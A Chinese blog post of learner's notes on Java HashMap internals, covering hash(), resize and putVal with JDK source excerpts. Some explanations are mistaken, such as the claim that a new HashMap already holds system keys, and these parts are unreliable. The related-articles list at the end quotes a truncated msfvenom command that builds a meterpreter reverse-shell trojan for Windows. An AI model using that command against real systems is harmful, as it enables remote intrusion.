HashMap原理总结
来总结一下HashMap的原理
1.HashMap当中有一个内部类,它叫Node,然后这个Node呢,它其实是实现了Map.Entry接口,这个接口当中有几个抽象的方法和几个具体的方法。其中Map.Entry<K,V>是一个泛型的元组。
2.Map.Entry接口中有如下抽象方法:
- getKey()
- getValue()
- setValue()
- hashCode()
- equals
3.Node的私有变量如下:
- hash
- key
- value
- Next node
其中HashMap的核心是hashcode的生成算法,hashCode的生成算法如下:
Objects.hashCode(key) ^ Objects.hashCode(value);
它是先通过得到Key和value的hashcode,然后对2个值进行异或操作后得到的值。
其中Object.hashCode是一个native的方法。
public native int hashCode();
其中Node的equals方法,传入的对象是object,只有当object的类型是map.entry并且,当前对象的key和value都和传入的key,value一致,那样才会返回相等。
下面的这个方法,是计算hash值的方法。它是通过key去计算,然后把拿到的hashcode和它右移16位的结果进行异或操作,具体回头再看为什么,我也不知道。
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
hashMap里面还有一个entrySet的成员变量,它是一个set 的集合,这里面的transient关键字不太懂,回头再看看。
transient Set<Map.Entry<K,V>> entrySet;
HashMap里面有一个非常重要的方法,叫做putVal()方法。这算是里面最核心的一个方法了,弄懂了这个方法,80%的HashMap相关的知识都能弄懂了
首先是有2个Node的声明,一个是tab,一个是p.
Node<K,V>[] tab; Node<K,V> p; int n, i;
下面我们来解析一下PutVal方法,如果table为空,或者table的长度为0,重置table的长度。
if ((tab = table) == null || (n = tab.length) == 0)
n = (tab = resize()).length;
首先是下面的代码会利用到上面的代码,n得出了一个结果,那就是resize()后的结果,下面的n-1就是“”最后“”一个元素
if ((p = tab[i = (n - 1) & hash]) == null)
tab[i] = newNode(hash, key, value, null);
下面的代码就是上面的tabl[x]里面的逻辑,这里面用到了按位与的一个运算:为什么要这么做?不知道。
来做一个小小的补充,这里要先复习一下按位与的结果操作,什么时候获取什么值,如果hash是一个负数,那又是什么情况呢?
(n - 1) & hash
我猜想的是,如果“”找到的“”元素为null,那么新建一个node元素。并且这个node元素的next为空。否则执行else里面的逻辑。
----------------------------------------我是分割线---------------------------------------------
首先putVal方法会去计算这个key的hash值。
首先我觉得要明白hash算法的真谛,网上找的这句话,说得不错:要找到散列为同一个值的两个不同的输入,在计算上是不可能的,所以数据的哈希值可以检验数据的完整性。
当第一次进入putval方法的时候,table是空的,所以肯定要进行一个resize操作,不光是table,连threshold都是0,所有的东西都未能初始化的情况下,这个时候,应该进入如下逻辑:
newCap = DEFAULT_INITIAL_CAPACITY;
newThr = (int)(DEFAULT_LOAD_FACTOR * DEFAULT_INITIAL_CAPACITY);
这个时候,newCapicity的话就变成了初始值16,newThr变成了初始化的Threhold,如果是这种情况下的话,就会新建一个长度为16的Node<K,V>[]数组,最后返回newTable,注意,resize操作的返回对象。
Node<K,V>[] newTab = (Node<K,V>[])new Node[newCap];
在下面的例子中,hash值是一个非常大的值,换算成2进制,它是32位长度的一个2进制,用按位与的操作是最快的,因为计算机内部结构就是二进制的。
if ((p = tab[i = (n - 1) & hash]) == null)
注意!!!它先填充的是tab[10]的内容,也就是说,并没有从0开始填充,这是违背我们直觉的一件事情。
然后让modCount++,
最后,如果负载因子小于size,那么,hashmap会自动扩容。
if (++size > threshold)
resize();
随后执行afterNodeInsertion方法,这个方法在Hashmap当中是一个空的方法,API里面介绍的是为LinkedHashMap所用,所以这里不再做讨论。还有注意下,如果是新建的hashMap第一次putval,那么它的返回值为null.
要注意一点,新建一个HashMap,它并不是独立存在的,在你把你的key添加进去之前,它还会添加非常多的其他的KEY,也就是我们所说的:系统路径,所以最后得出的结果就是,如果你是一个新的HashMap,那么,你添加了一个KEY,肯定这里面不止一个KEY。
大家可以观察到,当SIZE=13的时候,
其实是自动进入了resize这个方法的,你看我断点都进来了。这就证明了hashmap的自动扩容机制。
那么为什么会有这么多的Node被添加进来呢?原因只有一个,就是我们用idea启动项目的时候,一些类其实是用到了HashMap的,它优于我们调试的时候进入的HashMap,所以刚才大家才会看到那么多的节点被添加到hashMap当中去。
当我把在putVal上的断点去掉以后,就进入了如下代码块,验证了我的猜想。
另外还有一个很有趣现象,我用单元测试,新建了一个HashMap,结果。。。你发现没有,jdk里面已经填充了4项了,原来,我们认为的Hashmap,有多少项,就add多少项的观点其实是错误的!!!
下面我们再来看看如下代码,传入的hash和之前的hash进行对比,这里面可能大家有一些迷糊,当然包括我也看不懂,不过从这里可以获取一个非常重要的信息,这么做的方式就是为了避免一个hashmap钟可能出现“相同”的hash对象,我是这么理解的,如果有高人,可以来解释下为什么这样。
if (p.hash == hash &&
((k = p.key) == key || (key != null && key.equals(k))))
e = p;
下面的代码也很明白了,如果不是上面都 ,那么如果是树节点,那么就执行下面的逻辑,此处不再深究。
else if (p instanceof TreeNode)
e = ((TreeNode<K,V>)p).putTreeVal(this, tab, hash, key, value);
下面的代码的含义是,如果p.next为空的话,那么新建一个节点,并追加到尾部,这种情况,就是当p指向最后一个节点的时候才会出现的情况。
for (int binCount = 0; ; ++binCount) {
if ((e = p.next) == null) {
p.next = newNode(hash, key, value, null);
if (binCount >= TREEIFY_THRESHOLD - 1) // -1 for 1st
treeifyBin(tab, hash);
break;
}
if (e.hash == hash &&
((k = e.key) == key || (key != null && key.equals(k))))
break;
p = e;
}
后面的代码有点感觉太难啃了,先暂时就这样吧,今天的HashMap分析得还不太完整,并且不太合理,希望大家能多提宝贵建议。
HashMap原理总结的更多相关文章
- ==和equasl、hashmap原理(***)
public class String01 { public static void main(String[] args) { String a="test"; String b ...
- Java基础-hashMap原理剖析
Java基础-hashMap原理剖析 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 一.什么是哈希(Hash) 答:Hash就是散列,即把对象打散.举个例子,有100000条数 ...
- Java:HashMap原理与设计缘由
前言 Java中使用最多的数据结构基本就是ArrayList和HashMap,HashMap的原理也常常出现在各种面试题中,本文就HashMap的设计与设计缘由作出一一讲解,并解答面试常见的一些问题. ...
- HashMap原理(二) 扩容机制及存取原理
我们在上一个章节<HashMap原理(一) 概念和底层架构>中讲解了HashMap的存储数据结构以及常用的概念及变量,包括capacity容量,threshold变量和loadFactor ...
- java中HashMap原理?
参考:https://www.cnblogs.com/yuanblog/p/4441017.html(推荐) https://blog.csdn.net/a745233700/article/deta ...
- 2021超详细的HashMap原理分析,面试官就喜欢问这个!
一.散列表结构 散列表结构就是数组+链表的结构 二.什么是哈希? Hash也称散列.哈希,对应的英文单词Hash,基本原理就是把任意长度的输入,通过Hash算法变成固定长度的输出 这个映射的规则就是对 ...
- HashMap原理及源码分析
HashMap 原理及源码分析 1. 存储结构 HashMap 内部是由 Node 类型的数组实现的.Node 包含着键值对,内部有四个字段,从 next 字段我们可以看出,Node 是一个链表.即数 ...
- HashMap原理与优化
参考文献: HashMap的工作原理 java中HashMap重要性质和优化总结 一.HashMap的基本了解 基本定义:根据源代码的描述可知,HashMap是基于哈希表的Map接口的实现,其包含了M ...
- HashMap原理详解
HashMap 概述 HashMap 是基于哈希表的 Map 接口的非同步实现.此实现提供所有可选的映射操作,并允许使用 null 值和 null 键.此类不保证映射的顺序,特别是它不保证该顺序恒久不 ...
- 面试题 HashMap 原理
HashMap与HashTable的区别 总结: HashMap是用来代替HashTable的类,一般建议使用HashMap.最核心的区别:HashTable的方法是同步的(线程安全),而HashMa ...
随机推荐
- metasploit配置windows外网木马
首先在命令端输入./ngrok tcp 2222然后会变成这样 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i ...
- bzoj:4105: [Thu Summer Camp 2015]平方运算
Description Input 第一行有三个整数N,M,p,分别代表序列的长度.平方操作与询问操作的总次数以及在平方操作中所要模的数. 接下来一行N个数代表一开始的序列{X1,X2,... ...
- 2017"百度之星"程序设计大赛 - 资格赛【1001 Floyd求最小环 1002 歪解(并查集),1003 完全背包 1004 01背包 1005 打表找规律+卡特兰数】
度度熊保护村庄 Accepts: 13 Submissions: 488 Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/3276 ...
- Codeforces Round #336 (Div. 2)【A.思维,暴力,B.字符串,暴搜,前缀和,C.暴力,D,区间dp,E,字符串,数学】
A. Saitama Destroys Hotel time limit per test:1 second memory limit per test:256 megabytes input:sta ...
- Codeforces Round #300(Div. 2)-538A.str.substr 538B.不会 538C.不会 。。。
A. Cutting Banner time limit per test 2 seconds memory limit per test 256 megabytes input standard i ...
- Convex(扫描线降维)
Convex Time Limit: 10000/4000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others)Total Sub ...
- c++(排序二叉树线索化)
前面我们谈到了排序二叉树,还没有熟悉的同学可以看一下这个,二叉树基本操作.二叉树插入.二叉树删除1.删除2.删除3.但是排序二叉树也不是没有缺点,比如说,如果我们想在排序二叉树中删除一段数据的节点怎么 ...
- Oracle复制表结构及数据
1. 复制表结构及其数据: create table table_name_new as select * from table_name_old 2. 只复制表结构: ; 或者: create ...
- javascript如何处理多级的实时监听
今日工作中遇到需求,要求js代码对表单中的input内容进行实时监听,当input中的值改变时触发一些事件. 按照常规思维,代码很快写完了. $(function () { $("#inpu ...
- POJ 3829 Seat taking up is tough(——只是题目很长的模拟)
题目链接: http://poj.org/problem?id=3829 题意描述: 输入矩阵的大小n和m,以及来占位置的人数k 输入n*m的教室座位矩阵,每个值表示该座位的满意度 输入每个人来占位置 ...